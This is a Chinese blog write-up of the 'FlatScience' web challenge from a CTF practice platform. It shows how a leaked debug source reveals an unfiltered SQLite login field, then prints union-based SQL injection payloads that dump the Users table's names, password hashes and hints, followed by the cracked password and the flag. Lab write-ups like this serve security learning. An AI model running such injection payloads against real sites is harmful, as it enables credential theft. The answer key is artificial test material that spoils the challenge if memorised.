【攻防世界WEB】难度四星12分进阶题:FlatScience

最新推荐文章于 2023-12-12 17:03:48 发布
最新推荐文章于 2023-12-12 17:03:48 发布
阅读量674 收藏 3
点赞数 2
分类专栏: # 攻防世界WEB 文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125947879
版权

二、FlatScience

 

解题方法:

1、理解源码,数据库注入,加解密

过程:

还是先喜欢看robots.txt文件

/admin.php界面

/login.php界面

 Ctrl+U打开源码

发现了?debug

 发现了新源码

开始进行代码审计

发现数据库为SQLite3(与MySQL有一点区别,sqlite_master表中存着相关信息

type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息

且注释符为--

还发现输入的usr存在注入

没有任何过滤,能够拼接进数据库中执行

 使用bp拦截,并进行注入

(在bp中注入)

 判断字段数

1' order by 3 --

(报错)

 1' order by 2 --

(回显正常)

所以字段数为2

判断回显

1' union select 1,2 --

回显位为第二位

 

查sql表中字段

 CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29

 解码后

 CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

字段有:id name password hint

构造查询name

payload:

1' union select id, name from Users--

 admin

构造查询password

payload:

1' union select id, password from Users--

3fab54a50e770d830c0416df817567662a9dc85c

构造查询hint

payload:

1' union select id, hint from Users--

 my+fav+word+in+my+fav+paper%3F%21

解码后

my+fav+word+in+my+fav+paper?!

我们就得到了表中第一个数据

id=1

name=admin

password=3fab54a50e770d830c0416df817567662a9dc85c(MD5是消息摘要加密,可能会解不出来)

hint=my+fav+word+in+my+fav+paper?!(说的就是在他的论文里面)

 

解密出来了为

ThinJerboaSalz!

那个词为Salz

ThinJerboaSalz!减去Salz

所以密码为ThinJerboa

在/admin.php页面进行登录

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?} 

黑色地带(崛起)
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界—-(web进阶FlatScience–WP
12-14
打开目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界-web-FlatScience
wuh2333的博客
10-25 395
攻防世界webFlatScience
每日随机一ctf——web-FlatScience攻防世界
hk_hkl的博客
11-10 718
涉及内容:使用御剑进行目录扫描代码审计审计出一个sql注入的点sql注入爬取所有文档提升点:模仿御剑自己编写一个扫描器通过网上的资源去学习代码审计通过网上的资源去学习sql注入通过网上的资源去学习爬虫技术(爬取所有文档+将pdf转成txt)
攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1310
目 ---- FlatScience 一、writeup 二、知识点
[CTF目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1711
[CTF目总结-web篇]攻防世界flatscience
攻防世界-FlatScience
m0_47571887的博客
11-20 917
打开目,左右看了看,就是一些文章,试了下robots.txt,看到两个php 挨个访问,发现admin.php和login.ogo都是一个登陆页面,不过admin.php有一个默认的admin账号,猜测应该是获取到密码拿到flag,我们看看login.php里面有什么 在login.php页面里,我习惯性的先看一下源码,发现了一个?debug 提交过后,返回了一段源码, 这里我们看到数据库是SQLite3,不是MySQL,在sqlite数据库有一张sqlite_master表,..
中国首届医院网络安全攻防演练Web
07-13
中国首届医院网络安全攻防演练Web,厦门站。一个WEB站点 源码。
攻防世界pwn:Recho.doc
07-13
本文总结了攻防世界pwn:Recho.doc的知识点,涵盖了二进制文件析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件攻防世界pwn:Recho.doc是一个64位二进制文件,canary和PIE保护机制...
攻防世界pwn:forgot.doc
07-13
攻击防御世界pwn:forgot.doc 本文档是关于攻击防御世界pwn的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界web进阶FlatScience详解
hxhxhxhxx的博客
08-06 2749
攻防世界web进阶FlatScience目解法 目 解法 我们一个一个点进去发现也就是一些论文之类的 我们御剑发现了一些东西 robots。txt 我们登录试试 在login页面有报错,我们猜测是sql注入 他的源码中写到,登录是你不可能绕过的 这里源码中出现了?debug,可能是一个调试页面,我们访问看看 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['u
FlatScience攻防世界
m0_70819573的博客
02-28 284
发现$user基本没有过滤,可以进行sql注入,需要注意的是数据库是sqlite,查询语句与mysql会有差距,且其会自动创建sqlite_master库存储信息。4.用爬虫爬取所有论文,再用pdfminer库处理遍历pdf,获取admin密码,获得flag.3.在login.php查看源代码,发现get传参debug可以获取源码。并没有什么有效信息,发现robots.txt有提示信息。
攻防世界-Web高手进阶区-FlatScience
feng的博客
09-13 567
前言 我只能说,神仙。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界目练习——Web引导模式(五)(持续更新)
最新发布
qq_48550824的博客
12-12 294
果然在源码里看到里提示,应该是指出flag在/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt文件里,所以要想办法能查看到该文件,根据参考博客,这里应该是考察模板注入,但是我已经忘记了,去看看之前做的复习一下=_=这个文件后缀不能直接用php或者pHp,会提示说这是一个php文件,但是又需要后缀能够被识别为php文件,也就是要用不那么明显的php后缀但又必须能为识别为php的后缀。",也就是想要的不只是图片,可能要在文件后缀上试试改为php相关的。
【愚公系列】2023年05月 攻防世界-WebFlatScience
时光隧道
05-27 7572
Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议。该协议规定了机器人在访问网站时可以访问哪些页面和目录。一般来说,Robots协议被用来控制搜索引擎抓取和索引网站上的内容的方式。robots.txt文件必须放在网站的根目录下,并且它是一个普通的文本文件。它可以包含一系列指令,这些指令告诉搜索引擎蜘蛛哪些URL可以被访问,哪些不能被访问,访问的频率等等。
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 279
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
FlatScience XCTF web进阶FlatScience详解
林英俊的博客
09-11 607
FlatScience XCTF web进阶FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
攻防世界WEB进阶FlatScience
harry_c的博客
09-30 5449
攻防世界WEB进阶FlatScience一、析二、实操三、答案 FlatScience 难度系数: 1星 目来源: Hack.lu-2017 目描述:暂无 目场景: 略 目附件: 暂无 一、析 点击打开场景,发现都是文件下载的内容,是几篇英文文献 上一有用到的robots.txt,构造一下http://IP:端口/robots.txt 果然有重要内容: 二、实操 别进入像个网站...
新手进阶:详析上传漏洞攻防策略与案例
"本文是一篇关于Web突破上传漏洞的详细指南,适合初学者深入理解这一领域的安全。作者以Web开发者和渗透测试者的视角,首先介绍了上传漏洞的基本概念,强调了通过析和总结而非猜测来发现漏洞的重要性。文章...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值